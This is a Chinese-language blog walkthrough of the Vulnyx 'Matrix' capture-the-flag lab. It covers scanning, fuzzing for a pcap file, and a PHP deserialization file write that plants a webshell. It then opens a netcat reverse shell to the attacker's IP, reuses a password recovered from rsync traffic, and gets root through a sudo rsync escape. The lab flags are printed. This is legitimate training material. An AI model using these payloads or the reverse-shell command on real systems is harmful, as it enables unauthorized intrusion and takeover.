Pepster'Blog
Vulnyx-Matrix-Walkthrough
城南花已开 Lv6
  2025-02-01 18:26:51   2025-04-18 23:34:08    1.6k 字  8 分钟  

信息收集

服务探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       (Unknown)
192.168.60.2    00:50:56:e3:f6:57       (Unknown)
192.168.60.169  08:00:27:01:10:71       (Unknown)
192.168.60.254  00:50:56:e0:65:b2       (Unknown)

9 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.955 seconds (130.95 hosts/sec). 4 responded
export ip=192.168.60.169
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I don't always scan ports, but when I do, I prefer RustScan.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.169:22
Open 192.168.60.169:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-01 18:27 CST
Initiating ARP Ping Scan at 18:27
Scanning 192.168.60.169 [1 port]
Completed ARP Ping Scan at 18:27, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:27
Completed Parallel DNS resolution of 1 host. at 18:27, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 18:27
Scanning 192.168.60.169 [2 ports]
Discovered open port 80/tcp on 192.168.60.169
Discovered open port 22/tcp on 192.168.60.169
Completed SYN Stealth Scan at 18:27, 0.05s elapsed (2 total ports)
Nmap scan report for 192.168.60.169
Host is up, received arp-response (0.00064s latency).
Scanned at 2025-02-01 18:27:56 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:01:10:71 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

浏览器访问80端口发现,有两个选项

通过源代码发现红色药丸会跳转一个pdf

You have chosen truth. The Matrix awaits.

您已选择真相。矩阵在等待。

蓝色药丸则是跳转google

You have chosen illusion. Return to your normal life.

你选择了幻觉。回到你的正常生活。

image

同时源代码中还给了个提示

1
2
3
4
5
❯ curl http://192.168.60.169/
…………………………省略……………………
            <!-- Follow the red rabbit... Is it a dream or a clue? Within the saved traffic, you may find traces of the Matrix. Could it be a .pcap file ready to fuzz? -->
            跟随红兔... 是梦境还是线索?在保存的流量中,你可能会发现矩阵的蛛丝马迹。这可能是一个准备进行模糊测试的 .pcap 文件吗?
…………………………省略……………………

文件模糊测试

尝试wfuzz模糊测试一下pcap文件

得到一个trinity.pcap流量包

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
❯ wfuzz -c -u "http://$ip/FUZZ.pcap" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt  --hw 31
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.60.169/FUZZ.pcap
Total requests: 207643

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000013086:   200        986 L    5851 W     139908 Ch   "trinity"

打开流量包,从中发现了一张webp图片

保存另存为,改一下后缀

image

红色兔子正好符合了提示给我们的

这很显然是梦境

image

我还以为是图片隐写之类的,或者需要爆破图片

后面在图片描述中发现了有用的提示

1
2
3
4
❯ exiftool object172.image%2f.jpg
……………………省略…………………………
Description                     : Morpheus, we have found a direct connection to the 'Mind', the artificial intelligence that controls the Matrix. You can find it at the domain M47r1X.matrix.nyx.
莫菲斯,我们已找到直接连接到控制着矩阵的人工智能“Mind”的域名M47r1X.matrix.nyx。

php反序列化

编辑一下hosts,添加域名

访问M47r1X.matrix.nyx得到一个新的页面

image

我随便发送一些小写,他会返回一个地址

1
2
Morpheus, we successfully infiltrated the 'Mind' and uncovered part of its backend. We've made it accessible in the following file in case it can help you enter the Matrix: filtrate-backend-matrix.php.txt.
莫菲斯,我们成功地渗透了“Mind”并揭开了它的后端部分。我们已将其放入以下文件中,以防它可以帮助您进入矩阵:filtrate-backend-matrix.php.txt.

很显然他将后端的源代码泄露了出来

我们curl一下,加一点注释

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
❯ curl http://m47r1x.matrix.nyx/filtrate-backend-matrix.php.txt
<?php

class Message
{
    public $file = "messages.txt";  // 默认文件路径
    public $message = "";           // 默认消息内容

    public function __unserialize(array $data): void
    {
        // 如果传入的 $data 中有 'file' 字段,更新 file 属性,否则使用默认的 'messages.txt'
        $this->file = $data['file'] ?? $this->file;
        $this->message = $data['message'];  // 设置 message 属性

        // 将消息内容追加到指定文件中
        file_put_contents($this->file, $this->message . "\n", FILE_APPEND);
    }
}


明显的php的反序列化

访问一下message.txt

就是我之前输入的内容,追加到这个文件中了

1
2
3
4
5
6
7
❯ curl http://m47r1x.matrix.nyx/messages.txt

123
123
test
qwer

我们抓一下包可以发现发送的是序列化后的数据

image

那直接修改一些序列化后的数据

添加一个file参数指定文件名,后面加一句话木马

image

O:7:”Message”:2:{s:4:”file”;s:7:”exp.php”;s:7:”message”;s:15:”“;}

访问exp.php

image

用户提权

利用nc弹个shell过来

http://m47r1x.matrix.nyx/exp.php?0=nc%20192.168.60.100%204444%20-e%20/bin/bash

监听端口

1
2
3
4
5
6
7
8
9
❯ pwncat-cs -lp 4444
[19:49:14] Welcome to pwncat 🐈!                                                                                                       __main__.py:164
[19:49:16] received connection from 192.168.60.169:57084                                                                                    bind.py:84
[19:49:17] 192.168.60.169:57084: registered new host w/ db                                                                              manager.py:957
(local) pwncat$
(remote) www-data@matrix:/var/www/M47r1X.matrix.nyx$ cat /etc/passwd|grep /bin/bash
root:x:0:0:root:/root:/bin/bash
smith:x:1000:1000::/home/smith:/bin/bash

拿到一个用户名smith

回想流量包中有个rsync的流中有个密码

image

尝试登录一下

拿到user了

1
2
3
4
5
(remote) www-data@matrix:/home/smith$ su smith
Password:
smith@matrix:~$ cat user.txt
13fd11421e33199c2029bc8e5ed94626

Root提权

用户smith拥有sudo权限

利用rsync提权

1
2
3
4
5
6
7
8
smith@matrix:~$ sudo -l
[sudo] contraseña para smith:
Matching Defaults entries for smith on matrix:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User smith may run the following commands on matrix:
    (ALL) PASSWD: /usr/bin/rsync

尝试利用rsync上传一个公钥文件

873 - Pentesting Rsync - HackTricks

不过我没利用成功,好在rsync | GTFOBins中有提权方案

1
2
3
4
5
smith@matrix:/tmp$ sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
root@matrix:/tmp# id
uid=0(root) gid=0(root) grupos=0(root)
root@matrix:/tmp# cat /root/root.txt
5f3cae74fbcf1919cc7db7604317187a
  1. 信息收集
    1. 服务探测
    2. 文件模糊测试
    3. php反序列化
  2. 用户提权
  3. Root提权
© 2024 - 2025    城南花已开
由 Hexo 驱动 & 主题 Keep
本站由 提供部署服务
总字数 502.5k
  1. 信息收集
    1. 服务探测
    2. 文件模糊测试
    3. php反序列化
  2. 用户提权
  3. Root提权